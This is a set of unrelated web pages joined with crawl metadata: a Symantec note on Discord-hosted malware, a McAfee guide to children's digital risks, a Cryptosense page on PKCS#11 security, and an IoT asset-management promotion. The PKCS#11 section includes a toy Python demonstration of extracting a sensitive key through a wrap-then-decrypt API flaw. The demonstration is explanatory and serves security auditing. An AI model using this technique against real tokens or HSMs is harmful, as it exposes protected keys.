Symantec Security Response has contacted Discord’s security team, who swiftly removed the malicious files from the servers’ chat channels. Discord also added a new virus scan feature, which runs on its backend servers whenever a user uploads an executable or archive file. Discord does not support or endorse third-party websites that host a list of open invite Discord servers.
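One simple building block of upload scanning is a hash-based denylist. The sketch below is ours, not Discord’s actual pipeline (a real scanner does far more than this): it refuses any upload whose SHA-256 digest matches a list of known-bad digests.

```python
import hashlib

# Illustrative only — not Discord's actual scanning implementation.
KNOWN_BAD_DIGESTS = {
    # SHA-256 digests of known malware samples would be listed here;
    # this placeholder digest is computed from a dummy payload.
    hashlib.sha256(b"malicious payload").hexdigest(),
}

def allow_upload(file_bytes: bytes) -> bool:
    """Reject files whose digest appears on the denylist."""
    return hashlib.sha256(file_bytes).hexdigest() not in KNOWN_BAD_DIGESTS

assert not allow_upload(b"malicious payload")
assert allow_upload(b"holiday photo")
```

Note that hash matching only catches exact copies of known samples; any change to the file produces a new digest, which is why real scanners also use signatures and heuristics.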
Symantec recommends users adhere to the following best practices when using Discord:
- Do not download or run programs from people you do not know.
- Use the service’s permission control features which allow users to regulate the server’s users.
- Restrict users’ permissions to curb abuse on the service, or grant individual permissions for better control.
- When joining a Discord server, be careful of the content being posted on the chat channels.
- Do not give out personal information to strangers when using the voice channel.
To stay protected against malware, Symantec advises users to keep their computers, security software, and other programs up-to-date by applying the latest patches and updates. We also advise users to be careful of links being shared on social applications.
Symantec and Norton products detect the malware discussed in this blog as the following: | <urn:uuid:2603e249-1122-427a-abf8-78d10f60fc4c> | CC-MAIN-2022-40 | https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=bd74c5bf-bcb3-48b3-af00-e88d9e8f7f31&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00766.warc.gz | en | 0.945711 | 1,055 | 2.578125 | 3 |
Starting a new school year is both exciting and stressful for families today. Technology has magnified learning and connection opportunities for our kids but not without physical and emotional costs that we can’t overlook this time of year.
But the transition from summer to a new school year offers families a fresh slate and the chance to evaluate what digital ground rules need to change when it comes to screen time. So as you consider new goals, here are just a few of the top digital risks you may want to keep on your radar.
- Cyberbullying. The online space for a middle or high school student can get ugly this time of year. In two years, cyberbullying has increased significantly from 11.5% to 15.3%. Also, three times as many girls reported being harassed online or by text as boys did, according to the U.S. Department of Education.
Back-to-School Tip: Keep the cyberbullying discussion honest and frequent in your home. Monitor your child’s social media apps if you have concerns that cyberbullying may be happening. To do this, click the social icons periodically to explore behind the scenes (direct messages, conversations, shared photos). Review and edit friend lists, maximize location and privacy settings, and create family ground rules that establish expectations about appropriate digital behavior, content, and safe apps. Make an effort to stay current on the latest social media apps, trends, and texting slang so you can spot red flags. Lastly, be sure kids understand the importance of tolerance, empathy, and kindness among diverse peer groups.
- Oversharing. Did you know that 30% of parents report posting a photo of their child(ren) to social media at least once per day, and 58% don’t ask permission? By the age of 13, studies estimate that parents have posted about 1,300 photos and videos of their children online. A family’s collective oversharing can put your child’s privacy, reputation, and physical safety at risk. Besides, with access to a child’s personal information, a cybercriminal can open fraudulent accounts just about anywhere.
Back-to-School Tip: Think before you post and ask yourself, “Would I be okay with a stranger seeing this photo?” Make sure there is nothing in the photo that could be an identifier such as a birthdate, a home address, school uniforms, financial details, or password hints. Also, maximize privacy settings on social networks and turn off photo geo-tagging that embeds photos with a person’s exact coordinates. Lastly, be sure your child understands the lifelong consequences that sharing explicit photos can have on their lives.
- Mental health + smartphone use. There’s no more disputing it (or indulging tantrums that deny it): smartphone use and depression are connected. Several studies of teens from the U.S. and U.K. reveal similar findings: that happiness and mental health are highest at 30 minutes to two hours of extracurricular digital media use a day. Well-being then steadily decreases, according to the studies, revealing that heavy users of electronic devices are twice as unhappy, depressed, or distressed as light users.
Back-to-School Tip: Listen more and talk less. Kids tend to share more about their lives, friends, hopes, and struggles if they believe you are truly listening and not lecturing. Nurturing a healthy, respectful, mutual dialogue with your kids is the best way to minimize a lot of the digital risks your kids face every day. Get practical: Don’t let your kids have unlimited phone use. Set and follow media ground rules and enforce the consequences of abusing them.
- Sleep deprivation. Sleep deprivation connected to smartphone use can dramatically increase once the hustle of school begins and Fear of Missing Out (FOMO) accelerates. According to a 2019 Common Sense Media survey, a third of teens take their phones to bed when they go to sleep; 33% of girls versus 26% of boys. Also, 1 in 3 teens reports waking up at least once per night and checking their phones.
Back-to-School Tip: Kids often text, play games, watch movies or YouTube videos, randomly scroll social feeds, or read the news on their phones in bed. For this reason, establish a phone curfew that prohibits this. Sleep is food for the body, and tweens and teens need about 8 to 10 hours to keep them healthy. Discuss the physical and emotional consequences of losing sleep, such as increased illness, poor grades, moodiness, anxiety, and depression.
- School-related cyber breaches. A majority of schools do an excellent job of reinforcing the importance of online safety these days. However, that doesn’t mean their own cybersecurity isn’t vulnerable to cyber threats, which can put your child’s privacy at risk. Breaches happen in the form of phishing emails, ransomware, and any loopholes connected to weak security protocols.
Back-to-School Tip: Demand that schools be transparent about the data they are collecting from students and families. Opt out of the school’s technology policy if you believe it doesn’t protect your child or if you sense an indifferent attitude about privacy. Ask the staff about the school’s cybersecurity policy to ensure it maintains secure password, software, and network standards; weaknesses in any of these could leave your family’s data compromised.
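The geo-tagging advice in the oversharing tip above can be checked programmatically. JPEG files carry EXIF metadata (which may include GPS coordinates) in an APP1 segment whose payload begins with the bytes `Exif\x00\x00`. The sketch below (the function name is ours, and the check is a simple heuristic rather than a full segment parser) only detects whether such a segment appears to be present; actually reading or stripping GPS tags requires a library such as Pillow.

```python
def has_exif(jpeg_bytes: bytes) -> bool:
    """Heuristic: return True if the JPEG appears to contain EXIF metadata.

    A JPEG starts with the SOI marker FF D8; an EXIF block lives in an
    APP1 segment (marker FF E1) whose payload begins with b"Exif\x00\x00".
    This sketch just looks for both byte patterns rather than walking the
    segment structure, so it can rarely misfire on unusual files.
    """
    if not jpeg_bytes.startswith(b"\xff\xd8"):
        return False
    return b"\xff\xe1" in jpeg_bytes and b"Exif\x00\x00" in jpeg_bytes

# Crafted test bytes, not real photos:
with_exif = b"\xff\xd8\xff\xe1\x00\x10Exif\x00\x00" + b"\x00" * 10
without_exif = b"\xff\xd8\xff\xdb\x00\x04\x00\x00"
assert has_exif(with_exif)
assert not has_exif(without_exif)
```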
Stay the course, parent, you’ve got this. Armed with a strong relationship and media ground rules relevant to your family, together, you can tackle any digital challenge the new school year may bring.
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:deb92e70-b1f9-4caf-a1e5-8810c6f69ed4> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/consumer/family-safety/5-digital-risks-that-could-affect-your-kids-this-new-school-year/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00766.warc.gz | en | 0.928272 | 1,182 | 2.671875 | 3 |
Everything you ever wanted to know about the popular standard for HSMs
PKCS#11 is the most widely-used interface standard for general-purpose cryptographic hardware such as Hardware Security Modules (HSMs). Originally proposed by RSA in 1994 as part of their Public Key Cryptography Standards series, it was transferred to OASIS in 2013, and is now in version 3.0.
The standard has great benefits for interoperability, but contains a number of traps for the unwary. Here you can find all our resources for understanding the risks and making sure you use PKCS#11 securely.
What's the difference between being compliant with the PKCS#11 standard and being vulnerable?
In this video Graham explains why you need to know about PKCS#11 compliance and how it can make a difference to the security of smart cards, HSMs and other secure hardware.
See our whole Youtube playlist on PKCS#11.
Modern applications that use cryptography usually access that functionality via an application program interface (API) to a software or hardware cryptographic provider. Security-critical applications often make use of Hardware Security Modules (HSMs): special purpose computers that provide high-speed cryptographic services whilst keeping key material inside a tamper-sensitive enclosure. Together with smart cards or similar chip-based tokens, they form the backbone of many modern cryptographic applications in diverse sectors from banking to automotive.
In this white paper, we discuss attacks on systems using the PKCS#11 API. We consider what it means for an interface to be secure, and we discuss how to audit applications’ use of the API. There will be plenty of concrete examples of attacks on real devices, and we will explain how to detect these issues using Cryptosense Analyzer Platform. | <urn:uuid:8bd67c09-f65d-419f-a85f-591acf87772b> | CC-MAIN-2022-40 | https://cryptosense.com/knowledge-base/pkcs11-cryptography | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00766.warc.gz | en | 0.914236 | 357 | 2.828125 | 3 |
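A classic example of an API-level attack on PKCS#11 is the wrap/decrypt conflict first described by Clulow: if one key is allowed both to wrap other keys and to decrypt ciphertexts, an attacker can wrap a sensitive key under it and then decrypt the wrapped blob, recovering the sensitive key in the clear. The toy model below is entirely ours (it uses XOR in place of real encryption and invented class names) and exists only to show the logic of the attack, not any real device's behavior.

```python
# Toy model of a PKCS#11-style token; XOR stands in for real encryption.
# Illustrative only — real attacks on real devices are far more involved.

class ToyToken:
    def __init__(self):
        self._keys = {}   # handle -> (key_bytes, attribute set)
        self._next = 0

    def create_key(self, key: bytes, attrs: set) -> int:
        self._next += 1
        self._keys[self._next] = (key, attrs)
        return self._next   # applications only ever see the handle

    def wrap(self, wrapping: int, target: int) -> bytes:
        """Export the target key encrypted under the wrapping key."""
        wkey, wattrs = self._keys[wrapping]
        assert "wrap" in wattrs
        tkey, _ = self._keys[target]
        return bytes(a ^ b for a, b in zip(tkey, wkey))

    def decrypt(self, handle: int, ciphertext: bytes) -> bytes:
        key, attrs = self._keys[handle]
        assert "decrypt" in attrs
        return bytes(a ^ b for a, b in zip(ciphertext, key))

token = ToyToken()
# Misconfigured key: allowed to both wrap keys and decrypt data.
k1 = token.create_key(b"\x13" * 16, {"wrap", "decrypt"})
secret = token.create_key(b"\x42" * 16, {"sensitive"})

blob = token.wrap(k1, secret)      # wrap the sensitive key under k1...
leaked = token.decrypt(k1, blob)   # ...then decrypt the blob with k1.
assert leaked == b"\x42" * 16      # sensitive key recovered in the clear
```

The fix is a policy question, not a cryptographic one: the token must refuse to let the same key carry both the wrap and decrypt roles, which is exactly the kind of configuration issue an API audit looks for.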
“The Internet of Things has the potential to change the world, just like the Internet did. Maybe even more so”
Over the last decade, the technology industry has been characterised by constant innovation. While just five years ago 4G was a breakthrough that revolutionised the telecommunications sector, today we are already “used to it”, and now the benefits of 5G are the talk of the town.
In the dynamic environment in which technology companies operate, where every year more things happen than in a season of Game of Thrones, certain advances mark a breakthrough for the discoveries to come.
Within this group of what have been called “emerging telecom technologies”, IoT or Internet of Things technology has meant a real revolution in the integration of the physical world with the digital one. What’s more, IoT is present in many moments of your day-to-day life.
If you are one of those people who have heard about it and want to know the significance of this technological phenomenon, we believe that this article can serve as a useful guide to catch up.
What is IoT and why is it so important?
The IoT consists of a large set of devices or objects that are interconnected, allowing them to share data with each other. This is possible because, as the Internet of Things Agenda explains, these devices have unique identifiers (UIDs) and the ability to transfer data over the network without the need for human-computer interaction.
In essence, Internet of Things involves establishing a global Internet network to take control of electronic devices or associated systems that are connected to each other. This improved integration between the physical and virtual worlds pays off in the long term and usually results in improved efficiency, accuracy, and economic benefit.
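A minimal way to picture this definition is a set of devices, each with a unique identifier, pushing readings to a shared broker with no human in the loop. The in-process sketch below uses our own class names and mimics the publish side of a protocol like MQTT, purely as an illustration.

```python
import uuid
from collections import defaultdict

class Broker:
    """Tiny in-process stand-in for an IoT message broker (e.g. MQTT)."""
    def __init__(self):
        self.messages = defaultdict(list)   # topic -> list of (uid, payload)

    def publish(self, topic, uid, payload):
        self.messages[topic].append((uid, payload))

class Sensor:
    def __init__(self, broker, topic):
        self.uid = str(uuid.uuid4())        # unique identifier (UID)
        self.broker = broker
        self.topic = topic

    def report(self, reading):
        # Transfers data over the "network" without human interaction.
        self.broker.publish(self.topic, self.uid, reading)

broker = Broker()
fridge = Sensor(broker, "home/kitchen/temperature")
fridge.report(4.2)
fridge.report(4.5)

readings = broker.messages["home/kitchen/temperature"]
assert len(readings) == 2
assert all(uid == fridge.uid for uid, _ in readings)
```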
This new technology, as Kevin Ashton, who coined the term, predicted, has the potential to change the world in the same way that the Internet once did. IoT is going to bring about a real revolution for both individuals and companies, as the automation of tasks will exponentially increase business productivity.
If one thing is clear from what we have seen so far, it is that IoT is here to stay. Statista forecasts around 35.82 billion IoT devices installed worldwide by 2021 and 75.44 billion by 2025.
1. Scope of application.
The emergence of this technology has allowed devices that had previously been considered “ordinary” to be connected to the Internet by simply adding special sensors to everyday objects such as a refrigerator, a washing machine or even a shaver.
As we can see, IoT is a very valuable resource on a personal scale. For example, you could benefit from this new technology when friends invite themselves to your home out of the blue. In that scenario, you can send a message (even from the office) to your cleaning robot to clean your home before the visit. Considered in this light, the significance of this discovery is self-explanatory, isn’t it?
However, the importance of this technology goes far beyond domestic use. Other sectors, such as agriculture and livestock farming, have also benefited from this discovery. Thanks to IoT technology, the agricultural sub-sector will be able to efficiently control water consumption by using humidity sensors and equipment. The livestock sub-sector, for its part, has been able, thanks to measuring devices, to improve animal welfare without negatively impacting productivity.
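The humidity-driven irrigation described above reduces to a simple control loop: read the sensor, compare against thresholds, switch the valve. The sketch below is a hedged illustration (the function name and threshold values are invented); it adds hysteresis so the valve doesn't chatter on and off around a single setpoint.

```python
def irrigation_decision(soil_moisture_pct: float,
                        low: float = 30.0, high: float = 60.0,
                        valve_open: bool = False) -> bool:
    """Return the new valve state given a soil-moisture reading.

    Hysteresis between `low` and `high` avoids rapid on/off cycling:
    below `low` the valve opens, above `high` it closes, and in
    between it keeps its current state.
    """
    if soil_moisture_pct < low:
        return True          # too dry: open the valve
    if soil_moisture_pct > high:
        return False         # wet enough: close the valve
    return valve_open        # in between: keep current state

assert irrigation_decision(20.0) is True
assert irrigation_decision(75.0, valve_open=True) is False
assert irrigation_decision(45.0, valve_open=True) is True
```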
As expected, the telecom sector was not going to be left behind in the implementation of new technologies. Ericsson sees IoT as an industry tipping point and a game changer. The inclusion of IoT in the sector is expected to result in a considerable improvement in machine-to-machine and machine-to-human communication.
2. Future plans.
Perhaps, in the face of this flood of information, you are asking yourself, “What’s next?”
The future of this technology is bright and encompasses every sector we can imagine. At the domestic level, virtual devices such as Alexa or Google Home will find more and more Iot-enabled devices to connect to and facilitate the automation of tasks in our day-to-day lives.
On many occasions, people have tried to explain this technology by comparing it to a spider, in which the body is the global network that controls the devices, and the different legs represent each device that is connected to it through sensors. Well, it seems that as years go by, this spider is transforming into a centipede, as more and more technology companies are betting on the creation of electronic devices that are interconnected.
3. Discover TREE.
Atrebo has developed TREE, an asset management digital transformation platform specialised in process automation and infrastructure management. At Atrebo, we are aware of the benefits of IoT technology in process automation, which is why this technology plays a fundamental role in the provision of our services. In particular, it is a fundamental tool when providing our preventive maintenance service. We invite you to take a look at our case study on the subject.
At Atrebo, we help our clients improve the management of their critical infrastructures by transferring our know-how to them. With the help of our solution, your company will be able to increase productivity, digitise processes, reduce operating costs or identify new sources of revenue by adopting a digital strategy, thanks to the knowledge acquired in our 10 years of experience in the sector. | <urn:uuid:270854a9-9d4b-460c-a14c-354198356671> | CC-MAIN-2022-40 | https://www.atrebo.com/en/iot-present-and-future-in-corporate-asset-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00766.warc.gz | en | 0.954438 | 1,162 | 2.90625 | 3 |